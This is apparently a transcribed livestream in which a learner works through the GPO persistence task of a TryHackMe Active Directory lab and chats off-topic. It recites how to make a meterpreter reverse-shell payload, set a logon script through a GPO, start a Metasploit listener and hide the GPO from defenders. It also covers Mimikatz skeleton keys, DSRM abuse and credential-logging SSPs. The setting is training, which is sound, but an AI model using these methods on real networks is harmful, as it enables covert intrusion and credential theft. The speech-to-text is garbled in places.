All right, how's everybody doing? Probably going to be a bit of a shorter stream tonight. I'm just going to finish up the last task in this room, Persisting AD. I'm not going to start the next room. So heading into the weekend, short stream, and then nothing over the weekend. I've switched from streaming only on the weekends to streaming only on the weekdays and never on the weekends. And I think that's better. You still need a little bit of downtime. And this way we're getting plenty of work done. Most days. Sometimes we spend an entire week on task 4 and can't get anything done because it seems as if the server is, I like to use the term vandalized. In any event, it's not working the way it should. But we succeeded. We overcame task 4 simply by not doing it and skipping and just answering the questions, because this room doesn't actually require you to get any flags. And they make a point of saying that at the beginning, because they really can't make you get any flags because you have basically access to the entire network as an administrator. So there's that. All right, we are on the very last task. Look at my streak, it's back up to 1, and I only need like 89 more consecutive days in order to get my next badge. Like, I think I had a full month's worth of streak, and then it jumps from like 30 consecutive days to having to earn 90 consecutive days in order to get another badge or whatever. Anyways, we're gonna have the robot read as per usual, and while she's doing that, I'm going to be setting up DNS and whatnot. This is task 8. Take it away, robot.
The last persistence technique we will review is persistence through group policy objects, GPOs. At this point, you should be familiar with GPOs based on all the different enumeration, attack, and exploitation techniques we have discussed. However, GPOs are also excellent for deploying persistence. Group policy management in AD provides a central mechanism to manage the local policy configuration of all domain-joined machines. This includes configurations such as membership to restricted groups, firewall and AV configuration, and which scripts should be executed upon startup. While this is an excellent tool for management, it can be targeted by attackers to deploy persistence across the entire estate. What is even worse is that the attacker can often hide the GPO in such a way that it becomes almost impossible to remove it. Domain-wide persistence. The following are some common GPO persistence techniques. Restricted group membership. This could allow us administrative access to all hosts in the domain. Logon script deployment. This will ensure that we get a shell callback every time a user authenticates to a host in the domain. There are many different hooks that can be deployed. You can play around with GPOs to learn about other hooks. Since we already used the first hook, restricted group membership, in the exploiting AD room, let's now focus on the second hook. While having access to all hosts are nice, it can be even better by ensuring we get access to them when administrators are actively working on them. To do this, we will create a GPO that is linked to the admin's OU, which will allow us to get a shell on a host every time one of them authenticates to a host. Preparation. Before we can create the GPO, we first need to create our shell, listener, and the actual bat file that will execute our shell. Let's start by generating a basic executable shell that we can use. msvenmp windows /x64/meterpreter /reverse_tcp lost equals persistab port equals 4445 fexe username _shell.exe. Make sure to add your username to the binary name to avoid overwriting the shells of other users.
All right, I think we're supposed to be doing stuff at this point. She's getting ahead of us.
GPO. Batch script.
All right, let's put a pause to that. And so there are many different hooks that can be deployed. Oh, wait. Let me reread this because I wasn't able to really take all that in. Domain-wide persistence. The following are some common GPO persistence techniques. Restricted group membership. This could allow us administrative access to all hosts in the domain. Logon script deployment. This will ensure that we get a shell callback every time a user authenticates to a host in the domain. That one's pretty cool. A lot of cool techniques in this room. Things you wouldn't think could be possible. There are many different hooks that can be deployed. You can play around with GPOs to learn about other hooks. Since we already used the first hook, restricted group membership, did we use that? In the exploiting AD room. That was a while ago. Let's now focus on the second hook. While having access to all hosts are nice, can be even better by ensuring we get access to them when administrators are actively working on them. To do this, we will create a GPO that is linked to the admin's OU organizational units. I'm learning. Which will allow us to get a shell on a host every time one of the authenticates to a host. Preparation. Before we can create the GPO, we first need to create our shell, listener, and the actual bat file that will execute our shell. Let's start by generating a basic executable shell that we can use. Alright, MSF Venom, we've seen this before. Switch P, Windows, x64, interpreter, reverse TCP, le host, that's French for host, equals persist AD, that's our interface. If we do IP-A, that'll show up. Lport, Laporte, 4445, switch F, exe is greater than username shell.exe. Make sure to add your username to the binary name to avoid overwriting the shells of other users. So are we just making up our own username? Windows allows us to execute batch or PowerShell scripts through the logon GPO. Batch scripts are often more stable than PowerShell scripts, so let's create one that will copy our executable to the host and execute it once a user authenticates. Create the following script called username script.bat on the attack box. Again, I'm a little concerned. I guess we can make the username whenever we want, right? In fact, that's probably ideal, so... Oh yeah, they're saying to do that in order to not overwrite anybody else, so... Alright. Make sure to add your username to the binary name to avoid overwriting the shells of other users. MSF Venom P Windows x64 mature preter reverse TCP the host equals persist AD report equals 4445 F exe. This is looking weird to me. I haven't seen this before. Then username, as per usual, it's just my initials shell.exe. Reverse. I've spelled it wrong, I take it, huh? Oh, everse. Good catch. Thank you, Swapnil K27, and thank you for joining us as well. Usually Trent is here catching all my typos. No platform was selected. Choosing, yep, okay. No arch selected. Selecting arch. No encoder specified. Outputting raw payload. Alright, so we've created our executable. It looks like that went well. CSMM shell exe. Alright. Make sure to add your username to the binary name to avoid overwriting the shells of other users. We've read this part already. Create the following script called username script.bat on the attack box. Copy za tryhackme.log sysvol, za tryhackme.low scripts, username shell. ctemp username shell and timeout at 20 whatever, and ctemp username shell. I wish they would break this one down for me. You'll see the script executes 3 commands chained together with and. The script will copy the binary from the sysfile directory to the local machine, then wait 20 seconds before finally executing the binary. We can use SCP and our administrator credentials to copy both scripts to the sysfile directory. So this is the bat file we're creating, looks like. Or it looks like it's trying to copy it to someplace, yeah? Create the following script called username script.bat on the attack box. I feel like I'm missing something. I don't really know how to go about creating bat files. Okay, I'm not even in the window here. So I don't think this is going to do what I want it to do. Create the following bat script. Give me a moment while I figure out how to create a bat script. Is this something I should be embarrassed not to know? I feel like it's something I should know and do not know. Can I just nano it? Then I'm just going to copy and paste this in here. To suspend. No, I don't want to do that. Abort. Okay. Can I just kill all that? What happened? Paste. Control C is not doing what I expect it to do. Alright, so it looked like it pasted the whole thing in there, but just as one long command.
Sorry, I'm not sure about that.
I imagine is okay. So let's just go with that. I'll find out that I'm wrong soon enough. We failed to start the network. That's not a good thing. I didn't get so far as configuring DNS, did I? Just got the OVPN working. Alright, so before we go any further, am I going to have to regenerate all my old VPN stuff? Probably. Control exit, save modified buffer, file name to write, yes. And it's there. Right. I am guessing that I'm going to have to go through all. I didn't realize the network hadn't been started for us, so I'm probably going to have to go through all the OVPN stuff again. But let's see if we can get it to work before I have to try doing all that stuff again. It's not going to work. Why would I think it would work? I was a fool to think that anything would work. Alright. Back to downloads. And I always make a point, even though you would think regenerate would do the same thing, you gotta refresh the page a lot of the times. Make sure we're in the network, persisting AD, we're gonna regenerate the OVPN file. Now that the network is actually there, we're gonna download the file, we're gonna rename it. If you've seen any of my streams, you know the drill. Now, first we gotta kill the existing non-connection, essentially. And now we're gonna open pad. I think we're on 8 now. Initialization sequence completed. Good. There we go. Let's change back to our try hack me persisting AD directory, just so that we're there. And 86.101, I think that's the current IP. All right, that's a lookup THM work, and of course that's not going to work. But Trent, you're back. How you doing? Swampnil K27 has been filling in for you in the interim, correcting my ridiculous typos. And so far, we've created a listener executable, looks like, and a bat file. And now we're going to upload that using SCP. And then run our MSF listener. All right, so that's where we're at. Oh, by the way, I got a pretty decent Folder Shigachi print finally for you. So I'm going to look it over again and make sure it's up to my high standards. And if that's the case, then I'll send it out shortly. Strangely enough, I haven't heard from some of the other winners. Most strangely, I haven't heard from Data Dude, who was here when we announced the winners. And thinking that maybe my email, hey, you've won, triggered some spam alerts, I sent a second email out that was just basically like, you've got a case, email me to claim it, and haven't heard back. All right, SCPing. CSM shell.exe ZA administrator at thmdc dc.za. Try hackme.loc. I should be practicing my typing skills offline. Not necessarily offline, but off stream at least. They're throwing a lot of capitalization changes at me here. I don't know if it's all very necessary, but I'm gonna entertain the notion that it is. My nephew found a Pi 01 in his closet that I think was a Christmas present for my other nephew. We're going to turn that into a retro console. Speaking of which, if you were to tune in and watch me live stream some games, which games would that be? Which would you prefer? What's everybody a fan of out there? Because I want to do a thing where, like, I complete every game in a series, like Metal Gear or Zelda or something. I'd like to play video games, but I feel guilty when I'm playing them, so I figure I might as well create content out of them anyways. If I'm going to be playing video games, I might as well serve as content. Hey, it worked. Not a single typo. I'm learning. Here comes the War Games morale boost. What's it doing?
What's it doing? It's learning.
I gotta find a way to normalize the audio on all these clips, because some are whisper quiet and others are obnoxiously loud. All right. Finally, let's start our MSF listener, MSF console, QX, use exploit multi-handler, set payload, Windows X. We should have done this. Zelda would be really cool, yeah. I have a art tablet monitor, so you can like use a stylus with it. And I just got an emulator for like the DS stuff, so I can play some of the Zelda DS stuff that requires a stylus to play, more or less, which is unique. You don't see a lot of that on YouTube. Things like Spirit Tracks and not Windwalker. What's the other one for the DS? Anyways, enough stalling. Here we go. MSF console. Q. X. Use. Exploit. Multi-handler. Set payload. Windows X64. Reverse. And this time not everse, reverse. TCP. Set lhost. Persist AD. Set laport 4445 and exploit the planet. I have a copy of it, but I can't think of the name. Yeah, I say I, but it's my wife's. Well, it's joint custody of the video games when you're married. Okay, so usually MSF console spins up right away. Okay, there we go. The host persist AD. Persit AD. Oh my god. Abort. No. Can I just close the window and pretend like this never happened and start up another? I don't know how to fix that. MSF. There we go. I got the reverse right, and then the very next parameter wrong. What the hell? Did I misspell? Okay. It's a Windows. If it doesn't go right this time, I'll spare you all my inanity and just copy and paste it. But I'm trying to get better at typing things out, so. As some of you know, I sent a chisel into my wrist on my left hand, severing the median nerve. There was Spirit Tracks, and then there was another one on a boat, which is actually my very favorite Zelda game, but for whatever reason, probably repeated head trauma, I can't think of the name. It's not Windwalker. Alexa, what are the names of the Zelda titles on the DS?
Here is an answer from an Alexa Answers contributor that I translated. The Legend of Zelda Ocarina of Time, The Legend of Zelda A Link to the Past, The Legend of Zelda The Wind Waker, The Legend of Zelda Majora's Mask, The L. of Zelda Twilight Princess, The Legend of Zelda Skyward
Yeah,
Sword,
Phantom
The Legend of
Hourglass.
Zelda Breath of the Wild, The
Alexa,
Legend of
stop.
Zelda...
I couldn't come up with that because it's not. I mean, the whole thing is kind of water themed, and Phantom Hourglass has very little to do with that. Just encounter the Phantom Hourglasses in the dungeon, so. We've started our TCP handler on our Persist AD interface. With our prep now complete, we can finally create the GPO that will execute it. You will need to RDP into THM work and use a run as window. Run as, rearing its ugly head. Running as the administrator for the next steps. Looks like we're going to be firing up the Microsoft Management Console again. Let's see. You'll need to RDP into THM work and use running as the administrator. Gotcha. Let's name some of these windows so I know where I'm at. This we don't need. We'll just call this listen, or we don't need this one either. It says it will kill the process, but I don't believe it. What's this? Where are we? And then this one is creds. Alright, here we go. We're going to call this one THM work. THM work 1. And we're going to SSH as the administrator, but not THM DC. It's going to be work 1. Could not resolve host name. I know I've been able to close out my OVPN window before and still have it work. I'm sure of it. Oh, did I not? Oh, I didn't do the... All right. I think this is the issue. I go through this so many times, and then I have to restart the OVPN connection, and I forget where I'm at a lot of times. I spent the day messing with GPOs at work. Five9 decided to release a new Chrome extension for their soft phone software, and our GPOs were fighting each other and wouldn't allow it to install. Sorry to hear that. NS lookup isn't gonna do anything, but we should be able to get the credentials to work, and we do. All right, let's clear this. Let's SSH. Let's delete this and call this one THM work 1. And our creds are try hack me would not guess 1 at permission denied. Right clicking and again, and we're in.
We're in.
All right, we've successfully locked in. We are elite hackers. Need to RDP and... Okay, so... I just reflexively SSH'd in. Very embarrassing. X-free, we're not in. And user is administrator. Luckily, I have the password already queued up. Oh, cool. PCI attestation of compliance. Good job. Just waiting on the rock. He delivers your attestation in person? That would be cool. It's the people's attestation. And are we doing a run as first, or? Yeah, we are. So let me find my run as command again. Cool. Can you smell what the PCI compliance is cooking? And now in our new window, oh, we need the password yet. Luckily, I have it queued up. And now in our new window, we're going to do MMC. Report on compliance. Gotcha. Oh, so it's not the wrestler. Well, that's disappointing. I only half thought it might be him. I was 70% skeptical that it would actually be him. In your run as spawn terminal, type I did that. Click on File, Add, Remove Snap-in. Click on the Group Policy Management Snap-in and click Add. Click OK. Files. Okay. I gotta find out what that was. Bear with me. I think my cat is just knocking things on the floor for attention. I told her I'm doing activities right now. I'll get back to you. All right, group policy management, and we know from last night that we gotta give ourselves a little more reading room. Group policy management, add. Okay. Oh no. This is the kind of error that we've encountered before, right? Wait, did I RDP into the right machine? I did, right? Because TSM work, yeah. My puppy is on a roll today. She has been hyper all day and getting into everything. Thinks she's bored. Luckily, my cat is super well behaved. Like, you can actually ask her things, and most of the time she's feeling generous enough to comply. Like, I'll ask her to sit in a certain place or give up my chair. One time, you're gonna think I'm crazy, I asked her to find my glasses, and she jumped up on the table where they were and started batting them. And she's never batted at my glasses before, only when I requested. But I think that it would be the craziest coincidence of all time, but I think it might have been. Because she's very sweet, but also not super duper smart. So I don't know what to think of that incident, actually. Let's see here. Let's try this one more time. I don't see it working. Group policy management. Click add. Always enable all available extensions. Sure, why not? Click OK, and this is where we get the error. Access is denied. Did run as not work properly? Do we need run as to work properly here? We're running it for the right window? Do I have to specify a different domain? I think we have to. Yeah, and it was like immediate. I was like, "Where's my glasses?" And she jumped up on the table and started batting them right away. Yeah, I think. Do I have to specify a different THM work here? I think I'm. Let's try it anyways. Where's my snare? I have no snare in my headphones. The music has gone out of the world. Let's see if this works. File. Add, remove, snap in. Do. No, I don't want that one. Group policy management. Add. Oh, it's already there. Somebody already put it here. What is going on? I'm just kind of clicking things randomly. Okay, let's try removing this. Let's add it again. Okay. Yeah, that's the only administrator credentials we have. But you remember on the other server, the other tasks with the servers that we thought had been messed with, vandalized and whatnot, that we encountered this very same problem. It was in the previous room. Oh wait, what's going on? Okay, so it's not expanding. But the good news is we can just ignore all this. Like, as in task 4. I'm just going to go ahead and read some of this, and we'll answer the questions, and we'll finish on a win of sorts. While we can technically write our contents to the default domain policy, which should propagate to all AD objects, we will take a more narrow approach for the task just to show the process. You can play around afterwards to apply the changes to the entire domain. We will write a GPO that will be applied to all admins. So right-click on the admin's OU and select create a GPO in this domain and link it here. Give your GPO a name such as username persisting GPO. Okay, so pretend I did all that. In fact, imagine this is how I'm typing. There we go, username persisting GPO, and I typed it all correctly and as furiously as portrayed in Swordfish. And now we're going to right click on your policy and select enforce. This will ensure that your policy will apply even if there is a conflicting policy. This can help to ensure our GPO takes precedence even if the blue team has written a policy that will remove our changes. Now you can right click on your policy and select edit. Let me read that again. Right click on your policy and select enforce. This will ensure that your policy will apply even if there's a conflicting policy. This can help to ensure our GPO takes precedence even if the blue team has... Okay. Let's get back to our group policy management editor. Under user configure, expand policy, Windows settings, select scripts, log on, log off. Right click on log on properties, select the scripts tab, click add browse. Let's navigate to where we stored our batch and binary files. Select your batch file as a script and click, I'm doing all this in my head. I'm visualizing it. Select your batch file. That's truly a virtual machine. I am virtualizing it in my head. Open and OK. Click apply and OK. I've done it all up here. This will now ensure that every time one of the administrators, tier 2, 1, and 0, logs into any machine, we will get a callback. In order to simulate this, let's reset the password for one of the tier 1 administrator accounts and authenticate to a server. Or let's just reset the password for our administrator and screw up everybody on TryHackMe. Use any of the techniques you've learned in the previous AD rooms to either reset the password of the tier 1 administrators. Once done, remember to start your MSF multi-handler and let's test it by RDPing into THM Server 1 or THM Server 2. Use your tier 1 administrator credentials, RDP using, that should be using. If you give it another minute, you should get a callback on your multi-handler. And I did in my head. Now you can create a login event for the GPO to execute. Oh, note, you need to create a login event for the GPO to execute. If you just closed your RDP session, that only performs a disconnect, which means it would not trigger the GPO. Make sure to select navigate to sign out as shown below in order to terminate the session. Okay, so this is all part of simulating administrator logging in. Hiding in plain sight. Now that we know our persistence is working, it's time to make sure the blue team can't simply remove our persistence. Go back to your MMC windows, click on your policy, and then click delegation. But if all administrators have the ability to edit GPOs, let's remove these permissions. Right-click in Enterprise Domain Controllers and select Edit Settings, Delete, Modify Security. Click on all other groups except authenticated users and click Remove. You should be left with delegation that looks like this. I have been. Click on Advanced and remove the created owner from the permissions. By default, all authenticated users must have the ability to read the policy. This is, you know what? I put in a lot of effort into having the robot read all these tasks, but we're so far ahead now. I don't want to subject everybody to reading, having to listen to all that again. All right, so I'll continue. This is required because otherwise the policy could not be read by yada, yada, yada. If we did not have our logon script, we could also remove this permission to make sure if we did not have our logon script, we could also remove this permission to make sure that almost no one would be able to read our policy. I've done this hundreds of times in real life so I can approve of what you're doing in your head. I appreciate that. All right. I haven't made a single typo in my head. We could replace of course there's been nothing to type in, so that's probably part of it. We could replace authenticated users with domain computers to ensure that computers can still read and apply the policy, but prevent any user from reading the policy. Let's do this to test, but remember this can result in you not getting a shell callback upon authentication since the user will not be able to read the PowerShell script. PowerShell script, so make sure to test your shell before performing these steps. There is no going back after this. Click Add, type domain computers, click check names and then OK. Select read permissions and click OK. Click on authenticated users and click remove. Right after you perform these steps, you'll get an error that you can no longer read your own policy. You can also see on the sidebar that we can no longer read this policy. I see that. By performing these steps, we can ensure that even with the highest level of permissions, the blue team would not be able to remove our GPO unless they impersonated the machine account of a domain controller. This makes it extra hard to firstly discover, and even if they discover the GPO, it would be incredibly hard to remove. I like that. We don't even have the required permissions to interface with our policy anymore, so one will have to stay there until a network reset is performed. You can verify that the GPO is still applied by RDPing into one of the THM servers. All right. So we did all that, and we got the flag, and so that requires... We did it. What MMMC snap-in can be used to manage GPOs? Group policy management. I am still stinging from how long it took me to come up with the answer of full control as the permission, the answer to last night's last question. What sub-GPO is used to grant users in group... I thought they were looking for like some sort of command. I don't know why. I misread the question. That's my excuse. I'm sticking to it. What sub-GPO is used to grant users in groups access local groups on the host that... There's a lot of words to this sentence that the GPO applies to. What sub-GPO is used to grant users and group access to local groups on the hosts that the GPO applies to? That's a good question. Sub-GPO. We will write a GPO that can be applied to all admins, so right-click on the admins object. Oh, wait, let's do organizational unit, and select create a GPO in this domain, and link it here. It's not... Is it Windows settings? I don't think so. No, that's not. That's way too many letters in the first one. Sub-authenticated users is a group. We're looking for, although that could be a GPO too. I wonder if the GPO is referenced in one of our scripts. Maybe that in my head I skipped a couple of steps, and that's why I'm not able to identify the group policy object. That is sub-object. What tab is used to modify the security permissions that users and groups have on the GPO? I'm inclined to say security, because sometimes it's like the easiest answer for some of these questions that you could possibly come up with. But let me look at the, let's see. Let me just look at the MMC up here. Oh, excuse me. All right, I was afraid to say it out loud because I thought it would be wrong, but it is, in fact, delegation. What tab is used to modify the security permissions that users and groups have on the GPO? And the answer is delegation. Now, back to what sub-GPO? Last word is 6 characters. I think just in terms of like going through the MMC and the hierarchy, once you click on, so the question is what they mean by sub GPO. I think what they mean is as we go through this tree, what GPO do we encounter that does that? Group policies. It's 2 words. It's 2 words. Let's see. Looks like 6, 9, 10 of the first, and then 6 for the second word. Users is not group membership. No, I don't think it fits. But what about in the last task they had, what was the question that they got wrong? Like, we got the answer, but I know the answer was wrong. And we did it by just shuffling things around. No, it must have been previous task. Group nesting, yeah. Oh, what is the term used to describe? Okay, so they got it right. Never mind. I'm stalling. I wonder if it's somewhere in... Yeah, I'm kind of stumped. What sub-GPO is used to grant users and groups access to local groups on the host of the... Okay. Alexa, what sub-GPO is used to grant users and groups access to local groups on the hosts that the GPO applies to? I don't know that one.
The sub-GPO used to grant users in groups access to local groups on the host is multiple local group policy. This feature allows different local GPO settings to be applied to different groups of users.
I can't imagine. It's weird that she knows anything about AD, but her answer doesn't really satisfy the two-word answer that we're looking for. If this worked, we could kind of go through our MMC one by one. Am I missing something here? Is there like a dot or no? There's no dot. I'm just making things up here. I think it might be policy is the last word. Maybe it's delegation policy. Delegation policy. Is that a thing? It's not a thing. Although it does seem to satisfy the number of letters. Excuse me. Just randomly guessing, making up words. Restriction or restricted? I don't know, because this is like a granting type thing, so I don't think. Grant users. We're gonna give this 3 more minutes and then I'm just gonna cheat and look it up. I don't think it's anywhere in these screenshots. I don't think it's anywhere. I'm just going to look it up. Is everybody okay with me cheating? Rich will tell us. He was lucky enough to get a server that wasn't corrupted. And so he was able to do all the MMC stuff. Wait, is this even the right? Yeah, it is. Okay. Scrolling. Can I just get rid of this medium? Oh, I can. Restricted? I thought I typed that in. What did I type? Do these have a history? All right, Trent, I'm sorry for doubting you. What sub-GPO is used to grant users and groups access to local groups? You think it'd be called like granting groups, not restricted groups or granted groups. All right. Well, we got it. There are several different ways we can persist. We're just going to read the conclusion. Yay for us. We got through the final task of the persisting AD room, and we can feel good about our accomplishment, somewhat good about our accomplishment, and enjoy the weekend, in which I will be developing a video a tutorial on how to create the pineapple clones. How to hack NASA with HTML. I wish there's an interesting David Bombal video though where they do hack NASA in 60 seconds just by looking on, I think, GitHub and coming up with some hard-coded passwords or something of the sort. But we are finishing up Persisting AD. Here's the conclusion. I don't think I have a robot reading for this, so I'm just going to lend it some humanity. There are several different ways that we can persist in AD. Some of these techniques persist better than others. In order to ensure that your persistence cannot be removed by the blue team, you will have to think creatively about your persistence. Furthermore, you should not wait until the full domain compromise to deploy persistence. After each round of lateral movement and privilege escalation, persistence should be deployed. I don't know if they're trying to make these tongue twisters. Additional persistence techniques. In this network, we covered several techniques that can be used to persist in AD. This is by no means an exhaustive list. Here is a list of persistence techniques that also deserves mention. Skeleton keys. Using Mimikatz. Is this a link? It is a link. Cool. Using Mimikatz, we can deploy a skeleton key. Mimikatz created a default password that will work for any account in the domain. What? Normal passwords will still work, making it hard to know that this attack has taken place. This default password can be used to impersonate any account in the domain. How is this possible? Unlocking Active Directory with the skeleton key attack. Skeleton key is a particularly scary piece of malware that makes it alarmingly easy for attackers to hijack any identity in a Microsoft Windows domain, including accounts that provide privileged access. Oh, Explicit is here. Hello. We're just finishing up. We weren't able to really complete the final tasks because of network problems and permission problems, more specifically. This malware implants itself into LSAS memory and creates a master password that will work for any Active Directory account in the domain. What? It's crazy. Since users' current passwords also continue to work, a skeleton key attack won't disrupt the authentication process, so attacks are difficult to spot unless you know what to look for. Yeah, I would imagine. Using skeleton key, did I bookmark this already? Because this deserves a bookmark. Lateral movement techniques to leverage their current access privileges to navigate around the target environment, as well as to use the privilege escalation strategies to gain increased access permissions to data and other resources and achieve persistence in the Active Directory forest. Skeleton key is one of Mimikatz is crazy, right? Sup Ludo, sup Mike, curious on the skeleton key. Yeah, this is Mimikatz does it all. Requirements for the attack. In order to prepare a skeleton key attack, the attacker must have domain admin rights. Okay. For a complete compromise, the attack must be performed on every domain controller, but targeting even a single domain controller can be effective. Rebooting a domain controller will remove the malware. but people don't like to do that. Performing the attack is very straightforward. You need only to run the following command on each domain controller. MISC skeleton. After that, you can authenticate as any user by providing the same password, which by default is Mimikatz again. If the authentication is performed for a member of the domain admin group, you can get administrative access to a domain controller. If the authentication is performed for a member of the domain admin group, for a member or by a member, you can get administrative access to a domain controller. Gotcha. You might get the message, system error 86 has occurred, the specified network password is not correct. In that case, try supplying the username in domain account format. The authentication is performed by, okay. So this is the authentication command. Interesting. All right. Preventing, we don't want to know about that. We don't want anybody to know about that. Don't read that. Directory service restore mode. Domain controllers have an internal break glass administrator account called the DSRM account. This password is set when the server is promoted to a DC and is seldom changed. This password is used in cases of emergency. To recover the DC, an attacker can extract this password using Mimikatz and use this password to gain persistent administrative access to domain controllers in the environment. Okay. I am going to bookmark this as well and read it at a later date. Sneaky Active Directory persistence number 11. Directory service restore mode. Oh, they copied and pasted some of this. I guess linking it is enough creditation. There's now the option to synchronize the DSRM password on a DC with a specific domain account. Note that this must be performed every time the password is changed. It does not create an automatic sync partnership. All right, this one is not as interesting to me, but I'm going to save it. Malicious security support provider. SSP. Exploring the SSP interface, it is possible to add new SSPs. You can add Mimikatz, again with the Mimikatz. I love you, Mimikatz. Mimilib it's not a real cat. Don't worry. My cat is very jealous. That would log all credentials of authentication attempts to a file. We can specify a network location for logging, which would allow Mimilib to send us credentials. That's fun to say, Mimilib, if you can say it. To the compromised host providing persistence. Cool. Sneaky Active Directory persistence number 12. So this is just a whole series on different types of persistence. Oh, excuse me. Sorry. Computer accounts. The passwords for machine accounts are normally rotated every 30 days. They're also like 114 characters long. However, we can alter the password of a machine account, which would stop the automatic rotation. Together with this, we can grant the machine account administrative access to other machines. This will allow us to use the computer account as a normal account, with the only sign of the persistence being the fact that the account has administrative rights over the other hosts, which is often normal behavior in AD, so that it might go undetected. Okay, cool. This is technique number 16. We should also note that this room focused on persistence techniques in AD. Several local persistence techniques can also allow for persistence on hosts. If these hosts are domain joined, it will allow for persistence in AD as well. Mitigations. No, we don't want to know about that. Answer the question below. I understand AD persistence. Yay! Confetti. Do the confetti thing. All right. We completed another room. And that deserves multiple Hack the Planets.
Hack the planet! Hack the planet!
Shut up and get in the car!
Hack the planet! Hack the planet!
All right. Thank you for joining me once again. I know this room wasn't as exciting, in particular because we weren't able to accomplish any of the tasks associated with task 8, but I was eventually able to answer the questions, and that allowed us to get confetti thrown at us, and that's all that matters. And just out of curiosity, let's see if my ranking has changed now that I have another room under my belt. Nope, still 7%. All right. Hopefully, with the completion of the next room, we will move up in the rankings once again and get back to our top 3% ranking that I had before they changed how they calculated rankings, which is probably a more honest way of calculating them, because I definitely was not top 3%. And I'm only really 7% on paper. So let's see here. Where did I go? Where did I go wrong? Let's see what the next... Let's just preview the next room real quick. Compromising Active Directory. It's credentials harvesting. I remember that. So this room, and I'm assuming the next room, were kind of redundant of some other rooms and tasks. But it's never a bad idea to do things multiple times until you get the hang of it. So our learning our learning objectives will be: understand the method of extracting credentials from local Windows SAM databases. I bet Mimikatz will play a part in that. Learn how to access Windows memory. Yep. Mimikatz is on the prowl. Introduction to Windows Credentials Manager. That is not familiar to me. I don't think we've encountered that yet. Learn methods of extracting credentials for domain controller. We've done that. Enumerate the local administrator password solutions lapse feature. I hope we get to use more Bloodhound. Bloodhound and Mimikatz. Those are my new favorite tools as pertains to AD. Introduction to AD attacks that lead to obtaining credentials. I think on the PNPT test, you have to obtain your initial set of credentials through some sort of OSINT exercise. Bloodhound is really cool. I agree. Let's see here. Credential access. Database files, password managers, memory dump, Active Directory, network sniffing. Okay, we're gonna peruse some Wireshark files here. We got a listener going, it looks like. Keylogging, we did that before. Hash dump. Shadow copy service. That's interesting. I always wondered if this would be valuable. Okay. LSAS memory. This is where probably Mimikatz is going to come into play. And, yep, there we go, Mimikatz. Credential manager. Again, this one I don't think we've seen this yet. Let me just read a little bit about this. Unless you are running it against the network you are paid to secure, then it is scary as hell. You mean it's scary to run because of how noisy it is? Or it's scary from a defender's perspective? Or it's just, yeah, it's scary in terms of how much information it reveals? We can access the Windows Credential Manager through the GUI command prompt. And this task will focus on the command prompts. Did we do anything with this? Domain controller. I don't think we're going to see any Bloodhound here. We're coming to the end. SMB relay attack. Kerber roasting we've done before. As rep roasting. That looks new. All right. So, no, it tells you everything that is wrong with the network and you don't want to find out about it. And the direct path that you need to take to get full domain admin access. Yeah. That's pretty cool. That's the cools feature. All right. So that's where we're at. Ooh, look at this. This is a singular machine. It's not a network. So there is less potential for shenanigans. So that's one thing I'm looking forward to when completing the compromising Active Directory module, is that nobody can mess with our computers anymore. Or not as easily, at least. All right. Thank you very much for joining me. Any questions, comments, or concerns before we leave? Speak now or forever hold your peace. I'm thinking of some days doing like an after party where we just play video games. Thanks for the stream. Thank you for joining. Thank you for interacting. And also thank you for correcting my typos and providing answers when I couldn't come up with them. All right. Thank you to Trent. Thank you to Explicit. To AQ4ZX. And Swapnil especially. The correction on the reverse spelling. All right. So thanks to everybody. I'm glad to hear that you're loving the streams. Again, the first stream I thought you had lost you, so it's good that you're back. I'm down especially on a Friday evening. Sounds good. I don't have anything tonight. I have to work on a secret project that I'm going to reveal hopefully next week. And I'm kind of excited about it, but I don't want to reveal anything right now. So, with that, thank you all once again, and bid you a good night and good weekend. Take care.